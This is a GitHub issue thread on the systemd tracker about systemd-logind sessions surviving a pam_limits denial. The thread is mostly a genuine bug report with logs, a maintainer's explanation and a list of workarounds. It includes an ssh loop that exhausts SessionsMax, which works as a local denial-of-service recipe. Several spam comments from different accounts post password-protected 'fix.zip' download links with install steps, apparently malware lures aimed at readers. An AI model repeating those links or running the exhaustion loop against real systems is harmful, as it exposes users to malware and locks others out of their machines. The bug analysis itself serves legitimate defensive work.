### ISSUE TITLE
scope opened and session created even if session failed pam_limits.so

### ISSUE THREAD

**Issue by StephDC** [systemd/systemd#34131]
### systemd version the issue has been seen with

256

### Used distribution

AOSC OS

### Linux kernel version used

6.10.5-aosc-main

### CPU architectures issue was seen on

x86_64

### Component

loginctl

### Unexpected behaviour you saw

A systemd-logind session is created even when the pam_limits says the maxlogin is violated.

```
sshd-session[1948]: Accepted password for maintain from 172.16.129.67 port 50064 ssh2
sshd-session[1948]: pam_limits(system-remote-login:session): Too many logins (max 4) for maintain
sshd-session[1948]: pam_unix(system-remote-login:session): session opened for user maintain(uid=1000) by maintain(uid=0)
sshd-session[1948]: pam_systemd(system-remote-login:session): New sd-bus connection (system-bus-pam-systemd-1948) opened.
systemd-logind[846]: New session 36 of user maintain.
systemd[1]: Started session-36.scope - Session 36 of User maintain.
sshd-session[1948]: error: PAM: pam_open_session(): Permission denied

```

While sshd said "error: PAM: pam_open_session(): Permission denied", the systemd-logind session persists, and such rogue sessions can be used to flood the systemd-logind's 8192 SessionsMax, disallowing new systemd-logind managed session to be created.

It might also be the incorrect handling of sshd for failed session as well so I also contacted them with regards to this issue.

### Steps to reproduce the problem

```bash
# Setup public key auth in my own directory, optional
ssh-keygen
mv .ssh/id_rsa.pub .ssh/authorized_keys
# Create a lot of sessions by ssh
for sess in {1..8193}; do ssh -fN localhost; done
```

Then no one on the same host can login to Gnome any more.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by poettering** [comment]
*[Canned reply follows]*

This is the upstream bug and feature request tracker of systemd. Please use this only for issues in the two most current upstream systemd versions. See this link for the list of current releases.

https://github.com/systemd/systemd/releases

For support for older versions please contact your distribution instead.

In order to keep frustration at a minimum the submission form tried to make this all very clear.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by StephDC** [comment]
Reopen request - re-tested on Systemd 256 and edited the post accordingly.

Apologies for using the old version.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by StephDC** [comment]
Logs with PAM debug on

```
Aug 27 21:08:09 StaphTest sshd-session[6156]: Accepted publickey for maintain from ::1 port 48830 ssh2: ED25519 SHA256:mBgNI9QpXpnQSZUn9ctnYRBld3+ytHdg+uoN2gaPvi4
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): reading settings from '/etc/security/limits.conf'
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - rtprio 0 for DEFAULT
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - nice 0 for DEFAULT
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group audio
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - rtprio 65 for GROUP
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group audio
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - nice -10 for GROUP
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group audio
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - memlock 40000 for GROUP
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): reading settings from '/etc/security/limits.d/10-gcr.conf'
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group users
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): reading settings from '/etc/security/limits.d/20-session.conf'
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing hard maxlogins 8 for DEFAULT
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): reading settings from '/etc/security/limits.d/99-audio.conf'
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group audio
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - rtprio 95 for GROUP
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group audio
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): process_limit: processing - memlock unlimited for GROUP
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group pulse
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking if maintain is in group pulse
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): checking logins for 'maintain' (maximum of 8)
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_limits(system-remote-login:session): Too many logins (max 8) for maintain
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_unix(system-remote-login:session): session opened for user maintain(uid=1000) by maintain(uid=0)
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_systemd(system-remote-login:session): pam-systemd initializing
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_systemd(system-remote-login:session): New sd-bus connection (system-bus-pam-systemd-6156) opened.
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_systemd(system-remote-login:session): Asking logind to create session: uid=1000 pid=6156 service=system-remote-login type=tty class=user desktop= seat= vtnr=0 tty= display= remote=yes remote_user= remote_host>
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_systemd(system-remote-login:session): Session limits: memory_max=n/a tasks_max=n/a cpu_weight=n/a io_weight=n/a runtime_max_sec=n/a
Aug 27 21:08:09 StaphTest systemd-logind[1271]: New session 11 of user maintain.
Aug 27 21:08:09 StaphTest systemd[1]: Started session-11.scope - Session 11 of User maintain.
Aug 27 21:08:09 StaphTest sshd-session[6156]: pam_systemd(system-remote-login:session): Reply from logind: id=11 object_path=/org/freedesktop/login1/session/_311 runtime_path=/run/user/1000 session_fd=9 seat= vtnr=0 original_uid=1000
Aug 27 21:08:09 StaphTest sshd-session[6156]: error: PAM: pam_open_session(): Permission denied
```

And the session persists until I manually kill the ssh process, with the following.

```
Aug 27 21:19:45 StaphTest sshd-session[6161]: Received disconnect from ::1 port 48830:11: disconnected by user
Aug 27 21:19:45 StaphTest sshd-session[6161]: Disconnected from user maintain ::1 port 48830
Aug 27 21:19:45 StaphTest systemd[1]: session-11.scope: Deactivated successfully.
Aug 27 21:19:45 StaphTest systemd-logind[1271]: Session 11 logged out. Waiting for processes to exit.
Aug 27 21:19:45 StaphTest systemd-logind[1271]: Removed session 11.
```

loginctl seems to see this session as a normal session.

```
SESSION  UID USER     SEAT  LEADER CLASS   TTY   IDLE SINCE
     11 1000 maintain -     6156   user    -     no   -    
```

```
loginctl session-status 11
11 - maintain (1000)
  Since: Tue 2024-08-27 21:08:09 JST; 9min ago
  State: active
 Leader: 6156 (sshd-session)
 Remote: ::1
Service: system-remote-login
   Type: tty
  Class: user
   Idle: no
   Unit: session-11.scope
         ├─6156 "sshd-session: maintain [priv]"
         └─6161 "sshd-session: maintain"

Aug 27 21:08:09 StaphTest systemd[1]: Started session-11.scope - Session 11 of User maintain.
```

**Comment by poettering** [comment]
So why does that sshd-session process stick around when it got denies a PAM session?

logind appears to work correctly: we keep track of the session as long as it as a process around. And it does here: the sshd-session process. So you have to ask why that sticks around

so to me it appears everythingis in order in systemd here, you have to figure out why ssh doesn't disconnect on pam failure.

**Comment by StephDC** [comment]
sshd-session process stick around because according to openssh code [1] , if it got denied a session, sshd-session would still get created except with no capability whatsoever. They considered it a valid session as session module is late in stack and not suppose to block access.

pam_limits.so rejects the session, and utmp did not see a session, but pam_systemd.so considered it as a valid session and gave a session quota to such process.

If everything is behaving as expected, we now have a method to create a lot of systemd-logind sessions locally. I wonder if there is anything available on systemd's side to limit how many sessions a user can create, so that no user can create 8192 session by themself and allow all subsequent logins to go to system.slice/sshd.service instead of user.slice, or not allowing anyone else to login.

[1] https://github.com/openssh/openssh-portable/blob/10ccf611ab8ecba9ce6b0548c5ccd8c1220baf92/auth-pam.c#L1220-L1225

**Comment by poettering** [comment]
> sshd-session process stick around because according to openssh code [1] , if it got denied a session, sshd-session would still get created except with no capability whatsoever. They considered it a valid session as session module is late in stack and not suppose to block access.

i don't understand why you think there's a bug in systemd here?

systemd tracks process lifetime, and apparently am sshd process is still around, hence the session continues to be shown as open. hence all works as it should?

if you want that sshd exits on pam_limits failure, then that has nothing to do with systemd. hence why file a bug here?

not following?

**Comment by StephDC** [comment]
I file it because think it might affect other systems using systemd-logind with ssh access, but apparently I did not understand the logind session and got a mix-up on the meaning of "session" in different contexts. Apologies for the disturbance.

------

Just a quick sum up on what had happened.

We use systemd user slice to limit user usage to 80% of system memory. However a user by ssh into the system, created systemd-logind sessions once per 5 minutes, and all 8192 sessions in SessionsMax=8192 were used up. All subsequent logins stay in system.slice/sshd.service, thus allowing those processes to use the remaining 20% of memory, and cause OOM on other services including sssd.

I attempted to use pam_limits.so from linux-pam to limit how many sessions a user can create, but apparently their "session" means sessions in utmp as of the latest version of 1.6.1, and while sshd_session was considered a session in systemd, it was not a session in utmp. Such discrepancy allowed the user to continue to create 8192 systemd-logind sessions by ssh -N.

This could be tested by running the following command: `for session in {1..8192}; do ssh -fN localhost; done; ssh localhost`. It would either result in the last ssh session remain in system.slice/sshd.service or no one can login to the system depends on the control flag of session pam_systemd.so .

I tried to ask all 3 parties on what was really happening to figure out if there is any method to prevent the exhaustion of systemd-logind sessions by the act of one user in current code base. I filed it here in systemd as it is here that the logind exhausted the SessionsMax. I asked linux-pam because they are not limiting maxlogins as seen by systemd. I asked openssh because they allowed the process of sshd_session to keep going when the session failed. It appears that each party is doing as they expected. It is just the combination did not ended up well in my setup.

* openssh created the sshd_session process under the user as the user passed auth stack.
* linux-pam offers pam_limits.so for the session stack and would fail the session stack base on the utmp session count.
* systemd-logind creates a session for the user as there is a process running under the user.

------

As a personal note, I had put a few workarounds in my system right now to avoid a similar DoS. I hope these would help someone facing the same issue of systemd-logind session exhaustion.

* increase the SessionsMax of systemd-logind so that OOM happens before the SessionsMax exhaustion.
* modify the pam_limits.so so it count the sessions using sd-login.h instead of utmp.h
* modify the pam stack so when pam_limits.so failed, pam_systemd.so would be skipped to not create a session.
* use the openssh 9.2 feature of UnusedConnectionTimeout to close any session not doing anything after a short timeout.
* consider to write a pam_limits.so that enforces maxlogins in auth stack instead of session stack.

Again thanks for everyone for their input on this issue and apologies for taking your time. I would close this issue now.
